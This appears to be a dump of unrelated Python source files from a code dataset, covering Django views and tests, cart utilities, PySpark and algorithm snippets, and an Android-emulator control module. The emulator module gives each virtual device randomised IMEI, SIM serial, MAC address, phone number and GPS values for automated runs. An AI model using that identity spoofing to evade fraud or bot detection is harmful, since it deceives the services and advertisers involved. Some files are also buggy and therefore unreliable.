stor_cuisine.tools.stor.getStorageSpace('{namespace}')\n sp.upload('{flist}', source='{source}', excludes=['/__pycache__/', 
'(.*)\\\\.pyc$', '^\\/opt\\/code.*'])\n \"\"\".format(\n store_addr=service.model.data.storeAddr,\n namespace=service.model.data.namespace,\n source=service.model.data.sandboxPath,\n flist=service.model.data.flistName)\n\n cuisine.core.execute_jumpscript(upload)\n\n build(job.service, build_func)\n\n\ndef processChange(job):\n service = job.service\n args = job.model.args\n\n try:\n change_category = args.pop('changeCategory')\n except KeyError:\n # changeCategory not in args. we can't decide what to do\n return\n\n if change_category == 'dataschema':\n for key, value in args.items():\n capnp_key = j.data.hrd.sanitize_key(key)\n setattr(service.model.data, capnp_key, value)\n service.saveAll()\n","sub_path":"actorTemplates/packager/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"139640905","text":"import unittest\n\nfrom django.test import Client\n\nimport requests_mock\n\n\nclass SimpleTest(unittest.TestCase):\n def _call(self):\n response = Client().get('/slackin')\n self.assertEqual(response.status_code, 200)\n return response\n\n def test_nominal(self):\n with requests_mock.mock() as m:\n m.post('//slack.com/api/team.info', json=TEAM_INFO_RESPONSE)\n m.post('//slack.com/api/users.list', json=USERS_LIST_RESPONSE)\n\n response = self._call()\n\n self.assertIn(\n b'0 users online now of 2 registered.',\n response.content,\n )\n\n def test_throttled(self):\n with requests_mock.mock() as m:\n m.post('//slack.com/api/team.info', json=RATE_LIMITED_RESPONSE, status_code=429)\n m.post('//slack.com/api/users.list', json=RATE_LIMITED_RESPONSE, status_code=429)\n\n response = self._call()\n\n self.assertIn(\n b'-1 users online now of -1 registered.',\n response.content,\n )\n\n def test_error(self):\n with requests_mock.mock() as m:\n m.post('//slack.com/api/team.info', json={'ok': False, 'error': 'some-error'})\n m.post('//slack.com/api/users.list', json={'ok': False, 'error': 'some-error'})\n\n response = self._call()\n\n self.assertIn(\n b'-1 users online now of -1 registered.',\n response.content,\n )\n\n\nRATE_LIMITED_RESPONSE = {\n 'ok': False,\n 'error': 'ratelimited',\n 'headers': {\n 'Content-Type': 'application/json; charset=utf-8',\n 'Content-Length': '34',\n 'Connection': 'keep-alive',\n 'Access-Control-Allow-Origin': '*',\n 'Cache-Control': 'private, no-cache, no-store, must-revalidate',\n 'Date': 'Thu, 08 Mar 2018 02:19:26 GMT',\n 'Expires': 'Mon, 26 Jul 1997 05:00:00 GMT',\n 'Pragma': 'no-cache',\n 'Referrer-Policy': 'no-referrer',\n 'Retry-After': '9',\n 'Server': 'Apache',\n 'Strict-Transport-Security': 'max-age=31536000; includeSubDomains; preload',\n 'X-Content-Type-Options': 'nosniff',\n 'X-OAuth-Scopes': 'identify,read,post,client,apps,admin',\n 'X-Slack-Backend': 'h',\n 'X-Slack-Req-Id': 'ba437519-e114-49fd-99ae-ff30de936b6d',\n 'X-XSS-Protection': '0',\n 'X-Cache': 'Error from cloudfront',\n 'Via': '1.1 5f0ff016085532665645d41b997a1c90.cloudfront.net (CloudFront)',\n 'X-Amz-Cf-Id': 'EmRATI3hHeGMYiw-MNiG0FhGO79ZkAPz0fYYzrSaDTHbxHk_y7K4pw==',\n },\n}\n\nTEAM_INFO_RESPONSE = {\n 'ok': True,\n 'team': {\n 'id': 'T12345',\n 'name': 'My Team',\n 'domain': 'example',\n 'email_domain': 'example.com',\n 'icon': {\n 'image_34': 'https:\\/\\/...',\n 'image_44': 'https:\\/\\/...',\n 'image_68': 'https:\\/\\/...',\n 'image_88': 'https:\\/\\/...',\n 'image_102': 'https:\\/\\/...',\n 'image_132': 'https:\\/\\/...',\n 'image_default': True\n },\n 
'enterprise_id': 'E1234A12AB',\n 'enterprise_name': 'Umbrella Corporation'\n }\n}\n\nUSERS_LIST_RESPONSE = {\n 'ok': True,\n 'members': [\n {\n 'id': 'W012A3CDE',\n 'team_id': 'T012AB3C4',\n 'name': 'spengler',\n 'deleted': False,\n 'color': '9f69e7',\n 'real_name': 'spengler',\n 'tz': 'America\\/Los_Angeles',\n 'tz_label': 'Pacific Daylight Time',\n 'tz_offset': -25200,\n 'profile': {\n 'avatar_hash': 'ge3b51ca72de',\n 'status_text': 'Print is dead',\n 'status_emoji': ':books:',\n 'real_name': 'Egon Spengler',\n 'display_name': 'spengler',\n 'real_name_normalized': 'Egon Spengler',\n 'display_name_normalized': 'spengler',\n 'email': 'spengler@ghostbusters.example.com',\n 'image_24': 'https:\\/\\/...\\/avatar\\/e3b51ca72dee4ef87916ae2b9240df50.jpg',\n 'image_32': 'https:\\/\\/...\\/avatar\\/e3b51ca72dee4ef87916ae2b9240df50.jpg',\n 'image_48': 'https:\\/\\/...\\/avatar\\/e3b51ca72dee4ef87916ae2b9240df50.jpg',\n 'image_72': 'https:\\/\\/...\\/avatar\\/e3b51ca72dee4ef87916ae2b9240df50.jpg',\n 'image_192': 'https:\\/\\/...\\/avatar\\/e3b51ca72dee4ef87916ae2b9240df50.jpg',\n 'image_512': 'https:\\/\\/...\\/avatar\\/e3b51ca72dee4ef87916ae2b9240df50.jpg',\n 'team': 'T012AB3C4'\n },\n 'is_admin': True,\n 'is_owner': False,\n 'is_primary_owner': False,\n 'is_restricted': False,\n 'is_ultra_restricted': False,\n 'is_bot': False,\n 'updated': 1502138686,\n 'is_app_user': False,\n 'has_2fa': False\n },\n {\n 'id': 'W07QCRPA4',\n 'team_id': 'T0G9PQBBK',\n 'name': 'glinda',\n 'deleted': False,\n 'color': '9f69e7',\n 'real_name': 'Glinda Southgood',\n 'tz': 'America\\/Los_Angeles',\n 'tz_label': 'Pacific Daylight Time',\n 'tz_offset': -25200,\n 'profile': {\n 'avatar_hash': '8fbdd10b41c6',\n 'image_24': 'https:\\/\\/a.slack-edge.com...png',\n 'image_32': 'https:\\/\\/a.slack-edge.com...png',\n 'image_48': 'https:\\/\\/a.slack-edge.com...png',\n 'image_72': 'https:\\/\\/a.slack-edge.com...png',\n 'image_192': 'https:\\/\\/a.slack-edge.com...png',\n 'image_512': 'https:\\/\\/a.slack-edge.com...png',\n 'image_1024': 'https:\\/\\/a.slack-edge.com...png',\n 'image_original': 'https:\\/\\/a.slack-edge.com...png',\n 'first_name': 'Glinda',\n 'last_name': 'Southgood',\n 'title': 'Glinda the Good',\n 'phone': '',\n 'skype': '',\n 'real_name': 'Glinda Southgood',\n 'real_name_normalized': 'Glinda Southgood',\n 'display_name': 'Glinda the Fairly Good',\n 'display_name_normalized': 'Glinda the Fairly Good',\n 'email': 'glenda@south.oz.coven'\n },\n 'is_admin': True,\n 'is_owner': False,\n 'is_primary_owner': False,\n 'is_restricted': False,\n 'is_ultra_restricted': False,\n 'is_bot': False,\n 'updated': 1480527098,\n 'has_2fa': False\n }\n ],\n 'cache_ts': 1498777272,\n 'response_metadata': {\n 'next_cursor': 'dXNlcjpVMEc5V0ZYTlo='\n }\n}\n","sub_path":"example/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"567992657","text":"# -*- coding: utf-8 -*-\n\n# Python\nfrom functools import reduce\nfrom datetime import datetime\n\n# Third\nfrom mongoengine.errors import NotUniqueError, ValidationError\nfrom mongoengine.errors import MultipleObjectsReturned, DoesNotExist\n\n\n# Apps\nfrom shopping_cart.sentry import sentry\nfrom shopping_cart.messages import _MSG300\nfrom shopping_cart.responses import resp_already_exists, resp_exception\nfrom .models import Cart, Supplier, Variant, Image, Item\n\n\ndef create_cart(suppliers=None, products=None):\n '''\n Create cart with suppliers and products 
data if exists\n '''\n cart = Cart()\n\n if suppliers is None and products is None:\n return cart.save()\n\n supplier = create_supplier(suppliers)\n\n if supplier and products:\n try:\n product = create_product(products)\n\n except Exception as e:\n sentry.captureException()\n\n return resp_exception('Carts', description=e)\n\n subtotal, total = calculate_product_price(product)\n product.total = total\n product.subtotal = subtotal\n\n supplier.items.append(product)\n\n try:\n cart.suppliers.append(supplier)\n\n except Exception as e:\n sentry.captureException()\n\n return resp_exception('Carts', description=e)\n\n subtotal, total = calculate_total_and_subtotal(supplier.items)\n supplier.subtotal = subtotal\n supplier.total = total\n\n subtotal, total = calculate_total_and_subtotal(cart.suppliers)\n cart.subtotal = subtotal\n cart.total = total\n\n try:\n cart.updated = datetime.now()\n cart.save()\n\n except NotUniqueError:\n sentry.captureException()\n\n return resp_already_exists('Carts', 'carrinho')\n\n except ValidationError as e:\n sentry.captureException()\n\n return resp_exception('Carts', msg=_MSG300, description=e)\n\n except Exception as e:\n sentry.captureException()\n\n return resp_exception('Carts', description=e)\n\n return cart\n\n\ndef merge_carts():\n '''\n Merge de carrinho de compras caso existam compradores iguais user_id\n '''\n pass\n\n\ndef create_supplier(supplier):\n '''\n Adiciona o fornecedor\n '''\n if supplier:\n sup = Supplier(**supplier)\n else:\n sup = None\n\n return sup\n\n\ndef create_variant(data):\n '''\n Adiciona a variacao escolhida no produto\n '''\n try:\n variant = Variant(**data)\n except Exception as e:\n raise e\n\n return variant\n\n\ndef create_image(data):\n '''\n Adiciona a variacao escolhida no produto\n '''\n try:\n image = Image(**data)\n except Exception as e:\n raise e\n\n return image\n\n\ndef create_sellkey(product, variant):\n '''\n SellKey {Product Id}-{Seller Id}-{Supplier Id};{qty};{price};{subtotal};{total};{Shipping Rate};{shipping Fee}-{Variant Key}-{Variant Name} # noqa\n '''\n return '{}-{}-{}-{};{};{};{};{};{}-{}-{}'.format(\n product.product_id,\n product.seller_id,\n product.supplier_id,\n product.qty,\n product.price,\n product.subtotal,\n product.total,\n product.ship_flat_rate,\n product.shipping_fee,\n variant.key,\n variant.name\n )\n\n\ndef create_product(item):\n '''\n Adiciona produto no carrinho\n '''\n\n # TODO: Tratar variacao\n\n if 'variant' in item:\n try:\n variant = create_variant(item.get('variant', None))\n except Exception as e:\n raise e\n\n # TODO: Tratar Image\n\n if 'image' in item:\n try:\n image = create_image(item.get('image', None))\n except Exception as e:\n raise e\n\n # TODO: Criar Produto\n\n del item['image']\n del item['variant']\n\n try:\n product = Item(variant=variant, image=image, **item)\n product.key = create_sellkey(product, variant)\n except Exception as e:\n raise e\n\n return product\n\n\ndef get_supplier_by_id(suppliers, id):\n '''\n Return a supplier by id\n '''\n\n try:\n return suppliers.get(supplier_id=id)\n\n except NotUniqueError:\n sentry.captureException()\n\n return resp_already_exists('Carts', 'carrinho')\n\n except DoesNotExist:\n return None\n\n except ValidationError as e:\n sentry.captureException()\n\n return resp_exception('Carts', msg=_MSG300, description=e)\n\n except MultipleObjectsReturned as e:\n sentry.captureException()\n\n return resp_exception('Carts', msg=_MSG300, description=e)\n\n except Exception as e:\n sentry.captureException()\n\n return 
resp_exception('Carts', description=e)\n\n\ndef get_product_by_id(items, id):\n '''\n Return a supplier by id\n '''\n\n try:\n return items.get(product_id=id)\n\n except NotUniqueError:\n sentry.captureException()\n\n return resp_already_exists('Carts', 'carrinho')\n\n except DoesNotExist:\n return None\n\n except ValidationError as e:\n sentry.captureException()\n\n return resp_exception('Carts', msg=_MSG300, description=e)\n\n except MultipleObjectsReturned as e:\n sentry.captureException()\n\n return resp_exception('Carts', msg=_MSG300, description=e)\n\n except Exception as e:\n sentry.captureException()\n\n return resp_exception('Carts', description=e)\n\n\ndef calculate_product_price(product):\n '''\n Calculo do preços de cada item\n '''\n if product.qty <= 0:\n raise ValueError('A quantidade não pode ser menor que zero.')\n\n subtotal = product.qty * product.price\n total = subtotal - product.discount_price\n\n if product.ship_flat_rate:\n total -= product.shipping_fee\n\n return subtotal, total\n\n\ndef calculate_total_and_subtotal(model):\n '''\n TODO: refact with calculate_supplier_total_and_subtotal\n Calculate Total\n '''\n subtotal, total = 0, 0\n\n if len(model) > 1:\n subtotal = reduce(\n lambda x, y: x.subtotal + y.subtotal, model\n )\n elif len(model) == 1:\n subtotal = model[0].subtotal\n else:\n subtotal = 0\n\n if len(model) > 1:\n total = reduce(\n lambda x, y: x.total + y.total, model\n )\n elif len(model) == 1:\n total = model[0].total\n else:\n total = 0\n\n return subtotal, total\n","sub_path":"shopping_cart/cart/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"396592006","text":"class Solution:\n def minCut(self, s: str) -> int:\n self.s = s\n # return self.recursive(0, len(s))\n return self.iteration()\n\n def recursive(self, f, e):\n if self.is_palindrome(self.s[f:e]):\n return 0\n min_cut = float('inf')\n for i in range(1, e-f):\n cut = 1 + self.recursive(f+i, e) + self.recursive(f, f+i)\n if min_cut > cut:\n min_cut = cut\n return min_cut\n\n def iteration(self):\n n = len(self.s)\n check_palindrome = [[False for _ in range(n)] for _ in range(n)]\n for right in range(n):\n for left in range(right + 1):\n if s[left] == s[right] and (right - left <= 2 or check_palindrome[left + 1][right - 1]):\n check_palindrome[left][right] = True\n res = [[0 for _ in range(n+1)] for _ in range(n+1)]\n for i in range(n-1):\n k, l = 0, 2+i\n while k <= n and l <= n:\n # if self.is_palindrome(self.s[k:l]):\n if check_palindrome[k][l-1]:\n res[k][l] = 0\n else:\n t = [res[k+i][l] + res[k][k+i] for i in range(1, l-k)]\n res[k][l] = 1 + min(t)\n k += 1\n l += 1\n return res[0][-1]\n\n def is_palindrome(self, s):\n f, e = 0, len(s)-1\n while f < e:\n if s[f] != s[e]:\n return False\n f += 1\n e -= 1\n return True\n\n\nif __name__ == '__main__':\n s = 'aab'\n solu = Solution()\n print(solu.minCut(s))\n","sub_path":"min_cut_palindrome.py","file_name":"min_cut_palindrome.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"604928538","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n用来修改VMS文件的内容的,vms文件内容是xml格式,需要修改内部值来\n\"\"\"\nimport os\nimport subprocess\nimport uuid\nimport xml.dom.minidom\n\nfrom .utils import Utils\n\n\nclass VMSModifyHandler(object):\n\n def __init__(self, logger):\n self.logger = logger\n self.config_dir = 
os.path.dirname(os.path.abspath(__file__))\n self.config_xml_file = os.path.join(self.config_dir, 'vms.config.xml')\n self.print('The VMS Config XML Path: {}'.format(self.config_xml_file))\n self.configs = [] # config xml element\n\n for maybe_path in [\n 'C:\\Program Files\\Microvirt\\MEmu\\memuc.exe',\n 'D:\\VMSMicrovirt\\MEmu\\memuc.exe'\n ]:\n if os.path.exists(maybe_path):\n self.vmcmd = maybe_path\n break\n\n def print(self, msg, is_exception=False):\n if self.logger:\n if is_exception:\n self.logger.exception('Error:')\n else:\n self.logger.info(msg)\n else:\n print(msg)\n\n @staticmethod\n def get_local_mac_address():\n mac = uuid.UUID(int=uuid.getnode()).hex[-12:]\n return \":\".join([mac[e:e + 2] for e in range(0, 11, 2)])\n\n def get_vms_configs(self):\n return self.configs\n\n async def reload_vms_config_info(self):\n \"\"\"\n 更新、重载VMS的配置信息\n :return:\n \"\"\"\n\n self.configs = []\n dom = xml.dom.minidom.parse(self.config_xml_file)\n root = dom.documentElement\n\n machines = root.getElementsByTagName('machine')\n for one_machine in machines:\n if one_machine.hasAttribute('name'):\n machine_name = one_machine.getAttribute('name')\n machine_mac_address = one_machine.getAttribute('macAddress')\n self.print(\n \"Reading the '{0} - {1}' machine config information.\".format(machine_name, machine_mac_address))\n\n configs = one_machine.getElementsByTagName('config')\n self.print(\"The config information count = %d\" % len(configs))\n\n # 根据每一个config来处理内容\n for one_config in configs:\n if one_config.hasAttribute('enable') and \\\n one_config.hasAttribute('vmname'):\n config_enable = one_config.getAttribute('enable')\n config_vmname = one_config.getAttribute('vmname')\n config_vmid = one_config.getAttribute('vmid')\n config_enable_ads = one_config.getAttribute('enable_ads')\n config_start_cmd = one_config.getAttribute('startCommand')\n config_appium_cmd = one_config.getAttribute('appiumCommand')\n\n extend_vm_info = {\n 'win_x': one_config.getAttribute('win_x'),\n 'win_y': one_config.getAttribute('win_y'),\n 'win_scaling_percent2': one_config.getAttribute('win_scaling_percent2'),\n 'resolution_width': one_config.getAttribute('resolution_width'),\n 'resolution_height': one_config.getAttribute('resolution_height'),\n }\n\n self.configs.append({\n 'macAddress': machine_mac_address,\n 'vmid': config_vmid,\n 'vmname': config_vmname,\n 'enable': config_enable,\n 'enable_ads': config_enable_ads,\n 'startCommand': config_start_cmd,\n 'appiumCommand': config_appium_cmd,\n 'extend_vm_info': extend_vm_info\n })\n\n if not config_enable or config_enable != 'true':\n continue\n\n def modify_all_vms(self):\n if len(self.configs) == 0:\n self.print(\"The vms config file is invalid, please run reload_vms_config_info() function first.\")\n return\n\n for one_config in self.configs:\n config_enable = one_config['enable']\n config_vmname = one_config['vmname']\n config_vmid = one_config['vmid']\n config_path = one_config['path']\n\n if not config_enable or config_enable != 'true':\n continue\n\n # 判断配置是否是文件,并且具有可读写操作\n if os.path.isfile(config_path):\n self.print(\"vmid=%s, vmname=%s, vmsfile=%s\" % (config_vmid, config_vmname, config_path))\n VMSModifyHandler.rebuild(config_path)\n\n def set_vm_config(self, vmid, extend_info):\n self.print('start setting vm new config...')\n new_gps_pos = Utils.generate_new_pos()\n config_info = {\n 'macaddress': \":\".join(Utils.generate_new_mac_address_list()).upper(),\n 'linenum': str(Utils.generate_new_phone_number()),\n 'latitude': str(new_gps_pos['latitude']),\n 
'longitude': str(new_gps_pos['longitude']),\n 'simserial': str(Utils.generate_new_simserial()),\n 'imei': str(Utils.generate_new_imei()),\n\n # 'bssid': Utils.generate_new_bssid().upper(),\n # 'cellid': Utils.generate_new_cellid(),\n # 'ssid': Utils.generate_new_wifi_id(),\n }\n\n # 兼容扩展属性\n for key in extend_info.keys():\n value = extend_info[key]\n config_info[key] = value\n\n for key in config_info.keys():\n value = config_info[key]\n obj = subprocess.Popen([self.vmcmd, 'setconfig', '-i', vmid, key, value], stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n cmd_out = obj.stdout.read()\n obj.stdout.close()\n self.print(cmd_out)\n\n self.print('setting vm new config over ...')\n\n async def adb_devices(self):\n obj = subprocess.Popen(['adb', 'devices'], stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, universal_newlines=True)\n cmd_out = obj.stdout.read()\n obj.stdout.close()\n self.print('CMD: adb devices')\n self.print(cmd_out)\n\n async def start_vm(self, vmid):\n obj = subprocess.Popen([self.vmcmd, 'start', '-i', vmid], stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, universal_newlines=True)\n cmd_out = obj.stdout.read()\n obj.stdout.close()\n\n if cmd_out.strip() == 'SUCCESS: start vm finished.':\n return True\n\n return False\n\n async def stop_vm(self, vmid):\n obj = subprocess.Popen([self.vmcmd, 'stop', '-i', vmid], stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, universal_newlines=True)\n cmd_out = obj.stdout.read()\n obj.stdout.close()\n\n if cmd_out.strip() == 'SUCCESS: stop vm finished.':\n return True\n\n return False\n\n async def vm_is_running(self, vmid):\n obj = subprocess.Popen([self.vmcmd, 'isvmrunning', '-i', vmid], stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, universal_newlines=True)\n cmd_out = obj.stdout.read()\n obj.stdout.close()\n\n if cmd_out.strip() == 'Running':\n return True\n\n return False\n","sub_path":"Python-Books/code-projects/auto-appium-android/libs/vmsmodify.py","file_name":"vmsmodify.py","file_ext":"py","file_size_in_byte":7482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"249283188","text":"from django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.models import User, Group\nfrom django.shortcuts import render, redirect, render_to_response\nfrom testing.forms import RegistrationForm, EditProfileForm, Form3_form\nfrom testing.models import Document, Form1, Form3\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.template.loader import get_template \nfrom django.template import Context\nfrom django.shortcuts import render\nfrom django.views.generic import TemplateView\nfrom django.utils.encoding import smart_str\nimport os\nfrom django.conf import settings\nfrom django.views.static import serve\n\nfrom testing.forms import Form1_form\n\n\n\ndef HomePageView(request):\n template = get_template('index.html')\n variables = Context({ 'user': request.user })\n output = template.render(variables)\n return HttpResponse(output)\n\n\ndef register_page(request):\n if request.method == 'POST':\n form = RegistrationForm(request.POST, request.FILES)\n if form.is_valid():\n user = User.objects.create_user(username=form.cleaned_data['username'],password=form.cleaned_data['password1'],email=form.cleaned_data['email'])\n user.first_name=form.cleaned_data['first_name']\n 
user.last_name=form.cleaned_data['last_name']\n user.save()\n if form.cleaned_data['itemsField'] == '1':\n \n g = Group.objects.get(name='WGWP')\n g.user_set.add(user)\n else:\n \n g = Group.objects.get(name='GO')\n g.user_set.add(user)\n \n newdoc = Document(docfile = request.FILES['docfile'])\n newdoc.save()\n return HttpResponseRedirect('/')\n else:\n form = RegistrationForm()\n\n variables = RequestContext(request, {'form': form})\n return render_to_response('registration/register.html',variables)\n\n\ndef logout_page(request):\n logout(request)\n return HttpResponseRedirect('/')\n\ndef faq(request):\n return HttpResponseRedirect('/')\n\n\ndef profile_view(request):\n user = request.user\n form = EditProfileForm(initial={'first_name':user.first_name, 'last_name':user.last_name})\n context = {\n \"form\":form\n } \n return render(request, 'registration/profile.html', context)\n\ndef edit_profile(request):\n user = request.user\n form = EditProfileForm(request.POST or None, initial={'first_name':user.first_name, 'last_name':user.last_name})\n if request.method == 'POST':\n if form.is_valid():\n user.first_name = request.POST['first_name']\n user.last_name = request.POST['last_name']\n user.save()\n return HttpResponseRedirect('/profile')\n\n context={\n \"form\":form\n }\n return render(request,'registration/edit_profile.html', context)\n\n\ndef download_page(request):\n \n filepath=settings.MEDIA_ROOT+'/SWM_2016.pdf'\n return serve(request, os.path.basename(filepath), os.path.dirname(filepath))\n\n\ndef frm1(request):\n form = Form1_form\n user = request.user\n if request.method==\"POST\":\n form = Form1_form(request.POST)\n feed_cont = form.save(commit=False)\n feed_cont.user=request.user\n feed_cont.save()\n if form.is_valid():\n form.save()\n return HttpResponseRedirect('/')\n else:\n form=Form1_form()\n return render_to_response('registration/form1.html',{'form': form} , context_instance=RequestContext(request))\n\n\ndef frm3(request):\n form = Form3_form\n user = request.user\n if request.method==\"POST\":\n form = Form3_form(request.POST)\n if form.is_valid():\n feed_cont = form.save(commit=False)\n feed_cont.user=request.user\n feed_cont.save()\n newdoc = Form3(ww_waste = request.FILES['ww_waste'])\n newdoc.save()\n \n form.save()\n return HttpResponseRedirect('/')\n else:\n form=Form3_form()\n return render_to_response('registration/form3.html',{'form': form} , context_instance=RequestContext(request))\n\n\n\n","sub_path":"testing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"310024856","text":"# coding:utf8\n\nfrom pyspark.sql import SparkSession\n\n\nif __name__ == '__main__':\n # 0. 
Build the SparkSession entry-point object for the execution environment\n    spark = SparkSession.builder.\\\n        appName(\"test\").\\\n        master(\"local[*]\").\\\n        getOrCreate()\n    sc = spark.sparkContext\n\n    # Convert the RDD into a DataFrame\n    rdd = sc.textFile(\"../data/input/sql/people.txt\").\\\n        map(lambda x: x.split(\",\")).\\\n        map(lambda x: (x[0], int(x[1])))\n\n    # Build the DataFrame object\n    # Arg 1: the RDD to be converted\n    # Arg 2: the column names, given as a list of strings in order\n    df = spark.createDataFrame(rdd, schema=['name', 'age'])\n\n    # Print the DataFrame schema\n    df.printSchema()\n\n    # Print the data in df\n    # Arg 1: how many rows to show; defaults to 20 when omitted\n    # Arg 2: whether to truncate columns; if a value is longer than 20 characters, the rest is hidden and replaced with ...\n    # Passing False disables truncation and shows everything; the default is True\n    df.show(20, False)\n\n    # Register the DF as a temporary view so it can be queried with SQL\n    df.createOrReplaceTempView(\"people\")\n    spark.sql(\"SELECT * FROM people WHERE age < 30\").show()\n","sub_path":"spark-learn/SQL-demos/create-demo.py","file_name":"create-demo.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"148022736","text":"from django.core.management.base import BaseCommand, CommandError\nfrom sumo.models import SumoStage, SumoStageMatch, SumoGroupMatch, SumoGroup, SumoGroupTeam\nfrom random import shuffle\n\n\nclass Command(BaseCommand):\n    args = \"hede\"\n    help = 'Generates micro sumo groups.'\n\n    def handle(self, *args, **options):\n        group_robots = list()\n        last_stage = SumoStage.objects.all()[-1]\n        for match in SumoStageMatch.objects.filter(stage=last_stage):\n            if match.home > match.away:\n                group_robots.append(match.home.robot)\n            else:\n                group_robots.append(match.away.robot)\n        current_bye = last_stage.bye_robot\n        group_robots.append(current_bye)\n\n        for robot in group_robots:\n            SumoGroupTeam.objects.create(group=final_group, 
robot=robot)\n\n count = len(group_robots)\n order = 1\n for i in range(0, count-1):\n hold = group_robots[count-1]\n lst = group_robots[0:count-1]\n lst_shift = group_robots[0:count-1]\n for j in range(0,len(lst)/2):\n home = lst.pop()\n away = lst.pop(0)\n SumoGroupMatch.objects.create(home=home,\n away=away,\n group=final_group,\n order=order)\n order += 1\n SumoGroupMatch.objects.create(home=hold,\n away=lst.pop(),\n group=final_group,\n order=order)\n order += 1\n lst_shift.insert(0,lst_shift.pop())\n lst_shift.append(hold)\n group_robots = lst_shift\n","sub_path":"ituro/sumo/management/commands/generatefinalgroup.py","file_name":"generatefinalgroup.py","file_ext":"py","file_size_in_byte":1788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"42913248","text":"#! /usr/bin/env python\n# coding=utf-8\n\n\"\"\"\n\n读取 CWN 中的数据。\n\n词汇的形式属于繁体中文。由于词典是编纂而来,因此具有准确度和较低的召回度。\n\n修改原始的类与函数:\n\n1. 仿照WordNet,将词素、词义和义项拆分成三个类。\n2. 保留查询关系的函数;补充获取义项(Synset)列表的函数,因一个词素可对应多个义项。\n3. 籠統的講,詞彙(或詞素)和義項(或概念)之間是n:n的關係,這一點在CWN、WN、BN中都有所體現。\n 在指示對象的時候,概念和詞彙是一枚硬幣的兩面,它們具有等同的地位。\n \n 這種“地位等同”表現在“與其它表示相聯繫”的過程中。\n “其它表示”指的是:樣例、含義、主題或語義標籤等。在真正的符號理解之前,這兩種表示是等同的。\n\n 此處的“符號理解”是指:對於詞彙和概念的掌握和應用得以表現出來——以一種嚴格、普遍的規範表現出來。例示“等同”:\n - 假如我觀察到了一棵樹,我可以通過大腦的激活、或是詞典的查詢來收容這顆樹,進而作出下一步動作;\n - 假如我觀察到“樹”這個字,我可以查詢詞典,或者尋找樣例、或想象力再現以收容這個字,進而作出下一步動作。\n - 在我無法驗證我的動作的收益之時,我進行動作的四條途徑都是可行的,並且沒有差別。\n 在獲得驗��“途徑”的收益的規範之後,它們才因收益的不同而獲得不同的地位。\n\n#. 原始数据中,cwn_id并无外键,数据库的关系需要从代码中推测,因此,如函数lookup_relation的结果仍需要验证。\n\n\"\"\"\n\nimport io\nimport sys\nimport pandas as pd\nfrom sqlite3 import connect\n\npd.set_option('display.width', 720)\n\nconn = connect(database='/home/shawn/Projects/x.resources/semantic/CWN/cwn_dirty.sqlite')\nc = conn.cursor()\n\n\nclass Lemmas:\n def __init__(self, lemma_type):\n self.lemma_type = lemma_type\n self.lemmas = self.lookup_lemmas()\n self.lemma_ids = self.lemmas['lemma_id']\n\n def lookup_lemmas(self):\n c.execute(u'select * from cwn_lemma where lemma_type=\"{}\"'.format(self.lemma_type))\n _columns = [i[0] for i in c.description]\n return pd.DataFrame(c.fetchall(), columns=_columns)\n\n def lookup_relations(self, lemma_id):\n res = {}\n c.execute(u'select * from cwn_relation where cwn_id like \"%{}%\"'.format(lemma_id))\n for cwn_relation in c.fetchall():\n rel_type = cwn_relation[3]\n rel_lemma = cwn_relation[4]\n if rel_type not in res:\n res[rel_type] = [rel_lemma]\n else:\n res[rel_type].append(rel_lemma)\n return res\n\n\n# noinspection PyMethodMayBeStatic\nclass Senses:\n def __init__(self, lemma_id):\n self.lemma_id = lemma_id\n self.senses = self.lookup_senses()\n self.sense_ids = self.senses['sense_id']\n self.synset_ids = self.senses['synset_id']\n\n def lookup_senses(self):\n _senses = []\n c.execute(u'select * from cwn_sense where lemma_id=\"{}\"'.format(self.lemma_id))\n _columns = [i[0] for i in c.description]\n return pd.DataFrame(c.fetchall(), columns=_columns)\n\n def lookup_examples(self, sense_id):\n # return example contents of a sense_id.\n c.execute(u'select * from cwn_example where cwn_id=\"{}\"'.format(sense_id))\n _columns = [i[0] for i in c.description]\n return pd.DataFrame(c.fetchall(), columns=_columns)\n\n\nclass Synset:\n def __init__(self, synset_id):\n self.synset_id = synset_id\n self.synset = self.lookup_synset()\n\n def lookup_synset(self):\n # column member should be id in table of cwn_sense.\n c.execute(u'select * from cwn_goodSynset where id = {}'.format(self.synset_id))\n _columns = [i[0] for i in c.description]\n return 
